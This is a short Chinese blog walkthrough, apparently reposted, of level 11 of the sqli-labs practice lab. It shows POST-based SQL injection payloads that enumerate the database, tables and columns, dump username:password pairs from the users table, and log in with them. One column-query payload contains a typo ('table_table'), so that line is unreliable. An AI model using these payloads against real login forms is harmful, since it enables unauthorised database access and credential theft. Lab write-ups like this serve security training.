当前位置:网站首页>sqli-labs(less-11)

sqli-labs(less-11)

2022-07-17 10:50:00 不知名白帽

sqli-labs专栏地址

目录

 less-11(POST注入)

1.send to Repeater

2.单引号报错

3. 查库名

4.查表名

5.查段名

6.查数据

7.用查到的数据Dumb登录 

 less-11(POST注入)

1.send to Repeater

2.单引号报错

3. 查库名

aadmin' union select user(),database()-- 

4.查表名

aadmin' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security'--

5.查段名

aadmin' union select 1,group_concat(column_name) from information_schema.columns where table_table='users'--

6.查数据

aadmin' union select 1,group_concat(username,':',password) from users --

7.用查到的数据Dumb登录 

原网站

版权声明
本文为[不知名白帽]所创,转载请带上原文链接,感谢
https://blog.csdn.net/m0_63127854/article/details/125828495

边栏推荐

猜你喜欢

随机推荐